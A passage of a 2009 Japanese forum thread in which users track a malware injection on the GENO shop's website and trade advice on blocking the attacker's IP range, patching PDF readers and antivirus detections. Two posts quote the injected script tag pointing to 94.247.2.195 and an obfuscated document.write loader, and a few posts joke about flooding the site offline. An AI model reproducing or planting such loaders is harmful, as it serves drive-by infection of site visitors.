コスミレ(アラバマ州) :2009/04/07(火) 08:13:41.76 ID:DQxI7Qh1
ID:aQV3b+FBは良い仕事してるな
損失は計り知れないな。
697 :
コスミレ(東京都) :2009/04/07(火) 08:14:54.94 ID:8y99Mpqc
>>692 それプラス、ラトビアへの接続全て切るのだな。
ルーターかフィルタリングソフトで特定IPアドレス範囲を
切るやつがあるのでそれで切っておけば、GENOウイルスの活動は阻止できる。
オレの環境ではロシア・中国・韓国・台湾・香港・イタリアは元々切ってる。
今回、バルト3国追加した。
ほんとにまた例のアドレスに繋ぎに行くなw まじ糞だろgeno
700 :
ロウバイ(千葉県) :2009/04/07(火) 08:16:16.08 ID:Wf2gc1i4
ウィルス貼った奴とGenoマジで許さないからな 俺は本気でむかついたから誰か通報して怒っといて
701 :
コスミレ(アラバマ州) :2009/04/07(火) 08:16:43.88 ID:DQxI7Qh1
もう倍王で買うからいいよ
702 :
コスミレ(東京都) :2009/04/07(火) 08:16:54.01 ID:8y99Mpqc
>>694 復帰してやがる。
「むしろワザとやってんじゃねーのか?」
としか思えない。
てめえでやれよw
メンテナンス入ったw
707 :
オウレン(大阪府) :2009/04/07(火) 08:19:24.07 ID:KkHktETZ
祭り中のスレに短縮ウイルス貼ったら 引っかかる奴すさまじいだろうな。 短縮ウイルス貼ったら、貼った奴はどうなるの? アク禁?
709 :
トベラ(神奈川県) :2009/04/07(火) 08:20:59.19 ID:3DmbuZMk
クッキーなんかニコ動とようつべしか許可してません。
710 :
ハンショウヅル(コネチカット州) :2009/04/07(火) 08:20:59.58 ID:tv2tuZNC
>>697 おー!すげー!
そのIPアドレスリスト希望
ラトビアってトラフィック攻撃サイコガンだっけ?
あれ、またアクセスできる・・・。
712 :
モクレン(石川県) :2009/04/07(火) 08:21:22.09 ID:jLm5dvjo
>>707 会社からZIPを落とそうとして引っかかった哀れな人がすでにいたようですが
713 :
セキチク(関西地方) :2009/04/07(火) 08:21:26.14 ID:A+H9NpvZ
JSをOFFにしてても一度食わされたら→現状終了 ナニやってるか現在解らんし比較的新しい穴みたいなので明確な対処方法は不明。 正確な対応は現状お手上げ。GENOがウイルスをどっかに報告してノートン先生なりが対応してくれるまで詳細不明。 そしてそのGENOのサイトで今だ改善されてないのでとっとと閉じとけと。 とりあえずGENOはマトモにIPS運用汁。
p://www.geno.co.jp/xmlrss/07/geno_xml07.js これの最後とか本当に再発してるな
Genoさんウイルス復活おめw
716 :
オキザリス・アデノフィラ(東京都) :2009/04/07(火) 08:23:06.84 ID:ZxHViDpi
一応、親のパソコンのAdobe Readerアップデートしておいた ver.7だったな
717 :
ドデカテオン メディア(島根県) :2009/04/07(火) 08:23:55.64 ID:wl92jsLE
ブルースクリーンってどゆこと
718 :
ギシギシ :2009/04/07(火) 08:24:48.27 ID:llriVCjF
>>417 俺も送っておいたら返信が来た。
次回更新で対応するみたいだね
719 :
チリアヤメ(岩手県) :2009/04/07(火) 08:24:48.73 ID:2U+6KkTg
>>700 お前はVIPのオレンジ君に通じるものがあるなw
720 :
ヒサカキ(滋賀県) :2009/04/07(火) 08:24:49.29 ID:+o0F9ypb
青い画面
722 :
セキチク(関西地方) :2009/04/07(火) 08:26:20.02 ID:A+H9NpvZ
>>692 現状一度食わされた後はナニやってるかわからんので→終了
GENOがどっかにウイルス検体を提出して対応してもらうまでどーにもならん。
そもそもISPが導入されてるかも若干怪しい気がする。
って事で長引くんじゃないかい?
723 :
サポナリア(愛知県) :2009/04/07(火) 08:26:34.37 ID:i6gnM1Fe
再発してるしPDFファイル名が変わっとる>< 対策取れないなら いいかげんに諦めてWeb閉鎖すれば良いのに
>>716 おれはとりあえずしばらくネットは使うなって言っておいたw
725 :
ハルジオン(コネチカット州) :2009/04/07(火) 08:26:57.29 ID:RPctKvVK
GENO「なんか騒いでるのは一部だし〜、特に実被害もないし〜、ぶっちゃけ販売システムが壊れてなければどうでもイイし〜」
726 :
コスミレ(アラバマ州) :2009/04/07(火) 08:28:04.17 ID:DQxI7Qh1
727 :
デルフィニム(catv?) :2009/04/07(火) 08:28:35.18 ID:qY3g5ub0
まだ対応してないの?
geno_xmlXX.js また全部改竄されてるなwwwwww おもしろすぎwwwww
なんかもう怖くてサイト気軽に踏めない
とりあえず
>>697 みたいなアドオンでもないか探してみよ
GENOウイルスの名は伊達じゃない
PG2導入しようと思ったら、日本語版ダウンできねえw
ルーターで切っちゃうのが手っ取り早いよね
そういやPG2で海外全部弾いてたな…
735 :
ツボスミレ(福岡県) :2009/04/07(火) 08:32:16.62 ID:FKmNytLm
これは意図的にウイルス流してるんじゃね?
すげーぜgenoさん、ウイルス仕込まれまくってるな 今のとこ検知してるからいいけど新種仕込まれる前に 特攻するのも自重した方がいいか
ネットじゃなくてGENO本店でなんか言ってた?
>>720 英語よくわからんがありがと
>>722 一度も踏んではいないんだが今後踏みそうでコワいわ
739 :
イワザクラ(西日本) :2009/04/07(火) 08:33:40.58 ID:Osz0BGWd
740 :
セキチク(関西地方) :2009/04/07(火) 08:34:34.78 ID:A+H9NpvZ
とりあえず対策に書かれている 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 を「ルーター」に設定。クライアントはもう食ってると思ったら諦めてコレをしておくべき。
741 :
コスミレ(コネチカット州) :2009/04/07(火) 08:34:52.82 ID:pj1WzGHX
外付けのHDDも感染する?
742 :
ドデカテオン メディア(島根県) :2009/04/07(火) 08:35:56.83 ID:wl92jsLE
再起動する時いつもと変わらなかったけど これは感染してないってことだよね? ちなみにノートン先生でスキャンしても何もなかった
>>730 なんこか前のスレでGENO再度(集団虐殺)て言ってて上手いなあ!と感心した
もしかして、故意にウイルスを拡散させようとしてるのではないか?
745 :
コスミレ(東京都) :2009/04/07(火) 08:38:27.22 ID:8y99Mpqc
サイバーポリスと警視庁とかに通報しといてよ あとマイクロソフトにも
747 :
ヒサカキ(滋賀県) :2009/04/07(火) 08:39:20.84 ID:+o0F9ypb
geno_xmlXX.js のタイムスタンプ、4/7 07:57 ?
94.247.2.195なければ大丈夫ってわけでもない?
インディーズバンド†GENO†、カワイソス
753 :
ヒサカキ(滋賀県) :2009/04/07(火) 08:42:39.44 ID:+o0F9ypb
>>749 94.247.2.0/23(94.247.2.0〜94.247.3.255)っぽい。
糞会社 導入事例:株式会社GENO 様 システム概要|IT SOLUTION
755 :
プリムラ・ヒルスタ(関西地方) :2009/04/07(火) 08:46:48.32 ID:KYAPlMB5
756 :
タツタソウ(福岡県) :2009/04/07(火) 08:48:08.12 ID:0EhaQgLq
>>741 データ全消去してから一度フォーマットかけるべき
757 :
ドデカテオン メディア(島根県) :2009/04/07(火) 08:49:17.44 ID:wl92jsLE
>>173 専ブラで開こうとして表示されなかったんだけど大丈夫かな
ちなみにノートンでスキャンしたけど特に何も無し
再起動してもいつもと変わらなかった
758 :
ドデカテオン メディア(catv?) :2009/04/07(火) 08:52:00.79 ID:FwthmTsl
>>714 "<script src=//94.247.2.195/jquery.js></script>"
が出力されるようになってるw
759 :
コスミレ(東京都) :2009/04/07(火) 08:52:27.17 ID:8y99Mpqc
>>755 マジかどうかはその目で確かめてくれ www.kakiko.comが怪しいかどうかは
ググって調べてくれ。単にソースを表示するサイトだって分かるはず。
http://www.kakiko.com/check/?url=http%3A%2F%2Fwww.geno.co.jp%2Fmt.js <!--
document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
-->
ウイルスさん更新されたの? 作者というか改変したやつは豆だなあ
>>757 ソースみたらただのブラクラだからこれといって異常がなければ大丈夫だろ。
不安ならキャッシュを消しておけばいい。
762 :
ヒヤシンス(福岡県) :2009/04/07(火) 08:53:55.53 ID:pnDf58uK
タスクマネージャーみてもそれっぽいのいないしCPU稼働率も10%以下で落ち着いてるし感染してないと見ていいかな マジで怖いわ
763 :
ギシギシ :2009/04/07(火) 08:54:54.05 ID:llriVCjF
GENOがまた改竄されてるか juicyrock.co.jp は大丈夫なのか
>>757 Avastだと画像キャッシュにトロイが検出される
765 :
ドデカテオン メディア(島根県) :2009/04/07(火) 08:56:27.23 ID:wl92jsLE
>>761 くだらん質問に答えてくれてマジサンクス
安心したわ
766 :
ドデカテオン メディア(catv?) :2009/04/07(火) 08:58:01.18 ID:FwthmTsl
767 :
コスミレ(東京都) :2009/04/07(火) 08:58:38.96 ID:8y99Mpqc
>>760 暗号化方式前と違うなw
多分、botか何かだと思うけども、ファイル名と
スクリプトを毎回変えてくる辺り、定石を踏まえてるね。
げの見に行ったら本当にファイル名変わっててワロタ
769 :
コスミレ(東京都) :2009/04/07(火) 09:00:01.29 ID:8y99Mpqc
誰かメールで教えてやれよ。こんなの撒き散らされたら たまったもんじゃねーよ。なんだよこれ。
これはもうだめかもしれんね。
772 :
コスミレ(東京都) :2009/04/07(火) 09:02:45.11 ID:8y99Mpqc
お、いまさっき、 ://XXX.geno.co.jp/xmlrss/07/geno_xml07.js のウイルスコード消えたwww GENOの中の人?見てますか? やってもまたウイルスで更新されちゃうんだから、 侵入経路判明するまでサイト閉鎖しろ。 これは心からのアドバイス。
773 :
ドデカテオン メディア(catv?) :2009/04/07(火) 09:05:45.26 ID:FwthmTsl
p://94.247.2.195/jquery.js が更新された時間↓ PCの時計合わせてないのかな?? Last-Modified: Tue, 24 Feb 2009 15:56:18 GMT GENOはもうダメだろうな。 危機管理体制が終わってる。
まさにいたちごっこ
>>772 GENOにセキュリティー担当で雇ってもらえよ
776 :
プリムラ・マラコイデス(長屋) :2009/04/07(火) 09:06:28.15 ID:KHveeOxY
いっそ田代砲で落してあげたほうが、武士の情けのような気がしてきた
777 :
ヤエヤマブキ(大阪府) :2009/04/07(火) 09:07:26.20 ID:95PGP/4e BE:1680151777-2BP(1122)
>>719 ワロタwwww
あいつもウイルスで自爆したんだよな
>>771 × これはもうだめかもしれんね。
○ これはだめかもわからんね。
機長にあやまれ
779 :
ドデカテオン メディア(catv?) :2009/04/07(火) 09:08:35.95 ID:FwthmTsl
しかしよく出来たスクリプトだな。 これ書いてるやつはjsを完璧に使いこなしてるわ。
cyberpolice.go.jpにお願いして強制的にサイト閉鎖してもらうしかないな やつらこのまま営業続ける気だろ
781 :
ホトケノザ(catv?) :2009/04/07(火) 09:09:48.81 ID:gCb0mYyK
国内中古リユースが高まるとおいしくない諸外国の仕業
782 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:09:57.97 ID:wl92jsLE
GENO閉鎖できません!!
784 :
コスミレ(東京都) :2009/04/07(火) 09:11:12.11 ID:8y99Mpqc
>>780 このままウイルス感染→ファイル上書きってアホみたいなことを
これから何年も続けるかもしれん。
785 :
バイカカラマツ(catv?) :2009/04/07(火) 09:11:33.38 ID:GRlC9SeH
あのipaに報告しておきましたよ
786 :
コスミレ(東京都) :2009/04/07(火) 09:12:08.27 ID:8y99Mpqc
>>785 あいつらロリポル落とすのが本命の連中だから
どうにもならんだろ。
787 :
シデ(長屋) :2009/04/07(火) 09:12:25.05 ID:djLpucqQ
やべえノートン先生期限切れで脂肪中だ 不安だし金払うか…
788 :
オダマキ(アラバマ州) :2009/04/07(火) 09:12:34.71 ID:RVO46BVa
>>780 冗談抜きでやってもらうしかない
危機感がなさ過ぎるっつーか有耶無耶にしようとしてる節がある
田代砲で潰すか
助けて!ネッポポリス!
791 :
ビオラ(埼玉県) :2009/04/07(火) 09:13:26.52 ID:lAXM+gVu
>>754 その会社がサーバーごと管理してるんかいな
>>782 avast!
Adobeリーダーインストールしてるなら9にアップデート
Javaスクリプトonにしてるならoff
ラトビアをブロック
ほかはこのスレを参照
「GENOざまぁwww」的な発言が目に付くんですけど このショップって嫌われてる?
794 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:14:32.90 ID:wl92jsLE
ますます訳わかんねww 再起動しても大丈夫だったし このまま放置するわ
795 :
コスミレ(東京都) :2009/04/07(火) 09:14:48.22 ID:8y99Mpqc
avast!avast!avast! って、「!」を製品名につけるとこっぱずかしいなw
>>769 GENOは昔っからメールガン無視でつよ
798 :
スィートアリッサム(北海道) :2009/04/07(火) 09:15:44.45 ID:FLBx63e7
随分続くなこのスレ 被害者多いの?
799 :
ドデカテオン メディア(catv?) :2009/04/07(火) 09:15:50.54 ID:FwthmTsl
>>794 タスクマネージャ起動してsvchost.exeがあったら気を付けろ。
>>793 俺は嫌い
自作系の板とかでしつこく宣伝してくるから
メンテはじめたよ
802 :
イワザクラ(西日本) :2009/04/07(火) 09:16:21.01 ID:Osz0BGWd
524 : シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 02:37:04.72 ID:aXhN0DBC 踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。 IEのテンポラリに残ってた。 jquery[1].js 感染:Trojan-Downloader.JS.Agent.dwf A0G6M8XZ\Vy[1].pdf 感染:Exploit.Win32.Pidief.aog Avast!は最新版でも、このファイルを検出しなかった。 Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。 どなたかの参考になれば幸い。 avast!最強伝説は終焉した
804 :
オダマキ(アラバマ州) :2009/04/07(火) 09:16:34.34 ID:RVO46BVa
>>798 ネタ元が続行中なのに続かないわけがないと思うんだ
>>795 たしかに…w
あの警告音が!←に値する
806 :
サトザクラ(東京都) :2009/04/07(火) 09:17:40.07 ID:YJ0acd5U
まだ閉鎖できないのか
>>805 あれはマジで心臓に悪い
入れたら速攻サウンドオフw
808 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:21:10.34 ID:wl92jsLE
809 :
シデ(長屋) :2009/04/07(火) 09:21:17.71 ID:djLpucqQ
とりあえずfoxit更新してきた 怪しいURLは踏んでないしこのウィルス知ってからスクリプト切ってるし 特に挙動も怪しくないから大丈夫だと思いたい しかしノートン死亡 マカフィー嫌いだけど一括で入ってるし利用しようかねえ
810 :
クロッカス(東日本) :2009/04/07(火) 09:21:55.72 ID:v2pFr5JY
>>802 Avast!は接続をさせないのだwww
811 :
アグロステンマ アゲラタム(アラバマ州) :2009/04/07(火) 09:22:37.10 ID:F3zLYXU/
avast昨晩うpされたexeには無反応なんだし過信は禁物じゃないか
812 :
モクレン(石川県) :2009/04/07(火) 09:23:21.66 ID:jLm5dvjo
ぷいーんぷいーん
813 :
イワザクラ(西日本) :2009/04/07(火) 09:24:13.62 ID:Osz0BGWd
所詮は無料だしな 今回検出出来たのもたまたまだろう
814 :
コスミレ(東京都) :2009/04/07(火) 09:24:28.83 ID:8y99Mpqc
>>798 今年で一番被害者多いんじゃないの?ここ5年ウイルスとは無縁のオレでさえ
再インストールさせられたぐらいだから。
GENOなんて全く関心も無いし、知りもしなかったのだが、
zip偽装の短縮を踏んで飛ばされてアボーン。酷すぎる。
まあ、調子のって、マロにZIPを持っておじゃれ。とか言ってたからなんだがW
815 :
クロッカス(東日本) :2009/04/07(火) 09:25:09.76 ID:v2pFr5JY
感染URLは?
816 :
コスミレ(東京都) :2009/04/07(火) 09:27:28.84 ID:8y99Mpqc
>>813 まあ、そんな気はするけども、
全てを完全にスルーしたノートン先生よりはマシだろ。
なめてんのかと思ったよ。インタネットセキュリティだったら
防げたのかな?そっち入れてる人の状況知りたい。
817 :
クロッカス(東日本) :2009/04/07(火) 09:27:48.28 ID:v2pFr5JY
斧で手に入れたLa.exeに俺のBDちゃんは何時になったら反応してくれるんだろうか…
感染したのかしてないのかわからんからスキャン廚
Tempだけだったら電源切るだけで消えるから助かる
821 :
ニリンソウ(catv?) :2009/04/07(火) 09:31:28.23 ID:dDs8JGri
ノートンインタネットセキュリティは完全スルーだった
>>814 httpのステータスコードの300番台を無視するような機能があれば、
その手の被害はかなり防げそうだな。
823 :
ドデカテオン メディア(catv?) :2009/04/07(火) 09:32:08.27 ID:FwthmTsl
>>817 ブラクラ化して営業どころじゃなくなってたから閉じたのか。
今のメンテって改竄の対処よりセールの準備っぽいな。。
>>824 このまま行くと閉店セールになりそうだなw
826 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:36:32.66 ID:wl92jsLE
>>799 あったけど今のところ駆除できないんだよね?
今の状態でセールしたら凄いことになるだろうな… セールだと言ってurl貼りまくる奴が現れるだろうし、阿鼻叫喚な図が予想されるw
828 :
オウレン(大阪府) :2009/04/07(火) 09:37:36.22 ID:KkHktETZ
ウイルスを踏まないと買えない閉店セールとか。 それでもバックアップあるから、俺は買うぞ!
謝った方がいいと思うんだがなぜしないんだ 別に訴訟起こされる訳でもあるまいし
831 :
トベラ(関東・甲信越) :2009/04/07(火) 09:39:32.88 ID:4hDYUwJQ
かぁちゃんのパソコンが感染してた 誰だよ鬼女板にはったやつは
GENOは福袋でジャンク入れてきて クレームは全てガン無視 商品の程度も悪いしサポートは最悪 今回も何事も無かったように営業継続です
833 :
タツタソウ(福岡県) :2009/04/07(火) 09:40:40.43 ID:0EhaQgLq
再インストールするついでに丸4年使ってきたHDD変えたいから WDかSGが日立のIDEHDDの容量大きくて安いやつ紹介してくれw
>>828 |押すなよ!
|絶対に押すなよ
 ̄ ̄ ̄|/ ̄ ̄ ̄
○ ○
に /|
>ヽ |⌒|____|
ありゃ? またメンテ中?
839 :
ニリンソウ(東京都) :2009/04/07(火) 09:44:43.21 ID:fnlCOsDP
ネトゲだと結構前からある手だけど 何の情報抜いてんだろうな
840 :
トベラ(関東・甲信越) :2009/04/07(火) 09:44:54.94 ID:4hDYUwJQ
そういえばフレッツウイルスクリアでも検出された
URL偽装って短縮urlサイトを悪用した末尾偽装だけ? それともいくらでも自由に偽装できるもんなの? 後者なら実在の安全なサイトのrulを少しいじった感じに偽装、とか全く見分けようないな…。
842 :
ヤマシャクヤク(関西) :2009/04/07(火) 09:45:19.13 ID:/2jY6pW+
843 :
ヤエヤマブキ(catv?) :2009/04/07(火) 09:48:52.44 ID:zltZU2Gu
osusume.js, osusume_shouhin.js にまだ残ってるぞwwwwwwww
845 :
クロッカス(東日本) :2009/04/07(火) 09:51:07.53 ID:v2pFr5JY
GENOの力じゃ復旧は無理だな
847 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:53:34.48 ID:wl92jsLE
ノートンじゃ検出できないんだよね? PC初心者だからよくワカンネ
GENOなんて知らんけどおまえらあちこちに種まいてたりすんの? janeの自動画像DL切っといた方がいい?
850 :
アグロステンマ アゲラタム(アラバマ州) :2009/04/07(火) 09:54:41.70 ID:F3zLYXU/
いやいやマカフィー入れてみた La.zipがサクッと反応してサクッと消しやがった なんかマカフィーのくせにムカツクw
GENO・・・・メンテナンスしてまだウイルス配布してるじゃんか・・・ おいどうなってるんだこのPCショップは・・・
852 :
オウレン(大阪府) :2009/04/07(火) 09:54:55.85 ID:KkHktETZ
854 :
カタクリ(catv?) :2009/04/07(火) 09:56:13.45 ID:Nz2aOKAR
しかしどういった経緯でそういう事態になったんだろな
855 :
オキナワチドリ(岩手県) :2009/04/07(火) 09:56:36.94 ID:yOFciNDi
俺も二回小沢のAA貼って●焼かれて二度とコピペしなくなったわ 漫画喫茶からいいんじゃね
858 :
オウレン(大阪府) :2009/04/07(火) 09:58:27.37 ID:KkHktETZ
>>855 私はアク禁対象になる方を未然に防ぐ目的ですので
良心から出た行為をアク禁対象にするとは思えません。
理由が何だろうがマルチはアク禁対象だ
860 :
ジンチョウゲ(大阪府) :2009/04/07(火) 09:59:45.59 ID:CvQBCuwW
>>287 遅レスだがCookieSafeマジお勧め
861 :
ドデカテオン メディア(島根県) :2009/04/07(火) 09:59:46.80 ID:wl92jsLE
>>848 自分は
janeで踏んだんだけどエラーで表示されなかった
再起動しても問題なかったみたいだけど
アンチウイルスソフトavastだとキャッシュからトロイが検出されるらしい
試してないからよく分からん
java止めたからアニメ見られないお・・・
863 :
コスミレ(東京都) :2009/04/07(火) 10:01:44.01 ID:8y99Mpqc
>>858 そんな言い訳、2ch運営に通じるわけないだろ。
興味ないからって理由でYBBを1ヶ月規制したような
連中だぞw
一応、おまえの書き込み全部報告しておくから規制は確実だろうな。
864 :
ゲンカイツツジ(長屋) :2009/04/07(火) 10:01:55.93 ID:iaH3XBff
とりあえず、ゲノがマトモな店じゃないのはよくわかった。
865 :
オウレン(大阪府) :2009/04/07(火) 10:02:47.21 ID:KkHktETZ
アク禁ワロタ
上流の有線に連絡してるよな?
>>864 だな
店がウィルスで荒らされてるってのに無反応とか狂ってる
絶対ゲノでは買い物しないことに決めたわ
868 :
モクレン(石川県) :2009/04/07(火) 10:05:50.28 ID:jLm5dvjo
>>865 アク禁にはならんよ
書き込みができなくなるだけだから
まだ対応してないのか?
誰かスラドに記事投稿してくれませんか。 投稿しようと記事入力してたけど、オレには文才が無い事を忘れてた。 少しでもウィルス被害を食い止める為に、多くの人に知らせる必要があると思います。
871 :
ジンチョウゲ(大阪府) :2009/04/07(火) 10:06:28.10 ID:CvQBCuwW
>>821 何時パターンファイルアップデートしたの?
今朝(am7:00)の段階で検出出来る様になってるよ
872 :
ドデカテオン メディア(島根県) :2009/04/07(火) 10:07:08.41 ID:wl92jsLE
さすがカスペちゃんや!ようやってくれた!
GIGAZINEあたりが取り上げてくれないかな
>>872 特殊な設定にしてた場合は別だけど
jpgの場合は、ビュアーで開くだろ?
ビュアーはファイルが実はhtmlだったとしてもjavascriptを実行しないから問題無い
876 :
フサアカシア(catv?) :2009/04/07(火) 10:10:07.27 ID:Jsd5PteU
la.zip Virus.Dropper, Trojan dropper
>>864 福袋の頃から怪しい店だなと思っていたよ。
でもまさかウイルスとは・・・涙
職場のPC感染させてしまった。
スクイズを気をつけていたのに2ストライクになって安心したところで決められた心境。
>>872 日曜早朝に踏んでさっきほどバックアップから復元したんで
昨日以前のパターンファイル
今はVirtual PCで探りに行ってる
879 :
ニリンソウ(catv?) :2009/04/07(火) 10:12:05.01 ID:dDs8JGri
880 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 10:12:47.67 ID:izpoIvzz
881 :
ドデカテオン メディア(島根県) :2009/04/07(火) 10:12:48.04 ID:wl92jsLE
今朝からノートンでも検出できるようになったみたいだから スキャンしてみる 後は神のみぞ知る
良品中古 WindowsXP Proインストール済み というPCがウイルスに感染していてもスルーされるわけだな、GENOでは。
GENOもあほだけど感染者もあほだよ
884 :
ツゲ(東京都) :2009/04/07(火) 10:16:32.92 ID:0RcLjI3w
俺、もうAviraだけじゃ怖いからavastと二大体制でいくわ・・・ マジGENOしね、二度とかわねーよ
885 :
クロッカス(東日本) :2009/04/07(火) 10:17:03.91 ID:v2pFr5JY
10時回ったのでgenoサイト見てきたけど、変化無し。 でも、トップページだけ差替えで、後は放置って、まだ事の重大さに気付いていないようですね。 入れてて良かったandLinux
887 :
ツゲ(東京都) :2009/04/07(火) 10:18:49.19 ID:0RcLjI3w
>>885 とあるサイトに飛び込んだらaviraが反応した(調べた結果ウイルスだった)
別のサイトに飛んだらAvira反応なしでavastが反応した(上記同様)
別に実感できるほど重くなってないからこのまま行く・・・
AVGは更新きたの?
889 :
ねこやなぎ(長屋) :2009/04/07(火) 10:19:39.14 ID:Ej6qxMGK
GENO以外で危険な所って有ったの?
890 :
ムラサキナズナ(大阪府) :2009/04/07(火) 10:19:39.59 ID:gbiHC9/K
まあ今回ばかりはVista大勝利だなw
>>888 アップデート AVG - AVI 270.11.44/ 2044
検出の増強 新種のトロイの木馬 Generic13.UQF, Downloader.Delf.CFR, SHeur2.ZOQ, BHO.IHI, Dropper.VB.CCR, Worm/VB.FIG
2009 年 4 月 6 日
>>884 俺も2AVにしたわ
BDとClamAVこれでかつる!
893 :
クロッカス(東日本) :2009/04/07(火) 10:20:59.62 ID:v2pFr5JY
上の「トップページ」以外をクリックすると 左にメニューが表示されるけど そこをテキトーにクリックすると発動するから気をつけろ しかし何なんだこの低レベルな対策は…
895 :
モクレン(石川県) :2009/04/07(火) 10:21:28.09 ID:jLm5dvjo
Vista厨大勝利! XP厨ざまあwww
感染した avastとa-squadでフルスキャン ATFクリーナーでテンポラリ全滅 リーダー&フラッシュをアップデート ラトビアIPを遮断 不振な動きは無いけど心配だな
897 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 10:22:53.74 ID:izpoIvzz
>>872 仕込まれたスクリプトが実行されない限り大丈夫だと思う
専ブラは画像だけ取得しただけだから問題ないはず。
IEコンポとかのブラウザでアクセスしたら問題あるだろう
XPだがadobeのFlashもReaderも最新だった俺はなんともなかったようだ
900 :
クロッカス(東日本) :2009/04/07(火) 10:24:09.67 ID:v2pFr5JY
今度はブロックされるけど内容は表示されるんだな
902 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 10:24:13.60 ID:izpoIvzz
ところで、ノートン今日のアップデータで削除までしっかり対応したの?
903 :
セキチク(関西地方) :2009/04/07(火) 10:24:31.26 ID:A+H9NpvZ
とりあえずオレが管理者なら鯖を落としとくわ。
904 :
シザンサス(北海道) :2009/04/07(火) 10:24:33.24 ID:1AT369Zt
そもそもPDF再生ソフト無いから無問題だった
905 :
マンネングサ(大阪府) :2009/04/07(火) 10:24:52.67 ID:WwzL1JDC
スパイウェア対策ソフトでオススメどれだよ
鯖落とせばいいのに なんか鯖落としちゃダメって契約でもあんの?
907 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 10:26:26.48 ID:izpoIvzz
>>906 目先の営業利益しか考えてないか、今回のことを軽視しているか
知識0のやつらしかいない。のどれかだな
>>907 というかGENOだと全部当てはまってるだろw
そもそもjavascriptいらんよな、こんなシンプルなサイトなら
910 :
イワザクラ(catv?) :2009/04/07(火) 10:28:21.82 ID:+QGovsZO
意外と、単にシャットダウンの仕方がわからないだけだったりして
912 :
クロッカス(東日本) :2009/04/07(火) 10:28:48.39 ID:v2pFr5JY
>>896 ウェブシールドつけてたら感染から遮断してくれるはずなんだが。
913 :
カンパニュラ・サキシフラガ(大阪府) :2009/04/07(火) 10:29:33.19 ID:xLJJRuyw
誰かマスコミうごかせよ。 総力挙げようぜ
>>907 土日は休みたい
月曜日はやる気が起きない
原因解明とかやりたくない
そもそもそんな知識もない
謝罪とかメンドクサイ
とにかく売上が無くなるのは嫌だ
という事だろう。
915 :
モクレン(石川県) :2009/04/07(火) 10:30:23.20 ID:jLm5dvjo
ウイルス仕掛けられたのは被害者として同情するがその後の対応が酷すぎる 約二日間放置とか言い訳できないだろう
そろそろ3日になるのか ν速も3日ルールだっけ?
917 :
クロッカス(東日本) :2009/04/07(火) 10:31:29.00 ID:v2pFr5JY
>>758 AVG,Avast!Aviraに送っといた。
画面回転のホットキーがCtrlだかAlt、Homeボタンで勝手に動作 左キーが連続で効かない。多分ウイルス関係ないが、なんだこれ
>>914 それだと
もうGENOはつぶれるしかないな。
920 :
ヘビイチゴ(アラバマ州) :2009/04/07(火) 10:32:19.39 ID:lhyoCUbm
>>916 同一ソースなら・・・つーかそもそもソースすら無いからな
そろそろどこかニュース記事にしても良さそうだけど
>>891 来てたのか。 更新したらGENO行っても平気?
>>918 とりあえず、画面のプロパティ開いて、そこから直せばいいとおもう。
,ィィr-- ..__、j ル! { `ヽ, ∧ N { l ` ,、 i _|\/ ∨ ∨ ゝヽ _,,ィjjハ、 | \ `ニr‐tミ-rr‐tュ<≧rヘ > これはGENOが仕掛けた新手のSEOだったんだよ {___,リ ヽ二´ノ }ソ ∠ '、 `,-_-ュ u /| ∠ ヽ`┴ ' //l\ |/\∧ / --─‐ァ'| `ニ--‐'´ / |`ー ..__ `´ く__レ1;';';';>、 / __ | ,=、 ___ 「 ∧ 7;';';'| ヽ/ _,|‐、|」 |L..! {L..l )) | |::.V;';';';'| /.:.|トl`´.! l _,,,l | _,,| , -, ! |:.:.:l;;';';';'|/.:.:.:||=|=; | | | | .l / 〃 )) l |:.:.:.:l;';';'/.:.:.:.:| ! ヽ \!‐=:l/ `:lj 7 | |:.:.:.:.l;'/.:.:.:.:.:.! ヽ:::\:: ::::| ::l /
警察がうごいてもいい頃合いだな
926 :
オウレン(大阪府) :2009/04/07(火) 10:34:44.96 ID:KkHktETZ
日曜の深夜にマクドの無料クーポン祭りで短縮ウイルスの存在を知ったが もし日曜の午前〜夕方にかけて2chやってたら間違いなく引っかかってたと思う。
929 :
ツゲ(東京都) :2009/04/07(火) 10:35:05.80 ID:0RcLjI3w
これはVistaを買わせたいMicrosoftの壮大な陰謀 GENOは被害者、悪くない
930 :
ヤエヤマブキ(大阪府) :2009/04/07(火) 10:35:05.55 ID:95PGP/4e BE:1028664656-2BP(1122)
4月5日から7日にかけて当サイトが改竄され、悪意あるスクリプトが掲載されておりました。
当社としては警察など、公的機関への通報等・・・・・
また、その間にアクセスをされたお客様はウイルス対策ソフトの各種スキャンをご利用云々
そのうち絶対こういうことトップに書くんだろうなぁ
avastつかっててよかったカー!!! オーー!!!!!!!!1 ウンチヴァ捨ててよかったカー!!! オーー!!!!!!!!!!!!!1
あくまで不具合で通すんじゃね?
934 :
トベラ(関東・甲信越) :2009/04/07(火) 10:38:36.18 ID:4hDYUwJQ
俺のちんこもたたないんだけどこのウイルスのせいか
なんでGENOのURLないのかわらえるw
VPCでGENOに飛んで、メンテ中のページからカートの中身を見て、 ウィルスセキュリティZEROを表示させた後にTemporaryInternetフォルダを チェックしたらしっかりとウィルスのスクリプトが残ったw テキストにリネームしてVPC用の共有フォルダに保存したんだけど、 テキスト貼ったらまずいかな?
>>930 それ書くなら昨日書いてるだろ
昨日書かなかったってことはこれからも謝罪する気はないんだろw
938 :
カンパニュラ・サキシフラガ(大阪府) :2009/04/07(火) 10:41:49.04 ID:xLJJRuyw
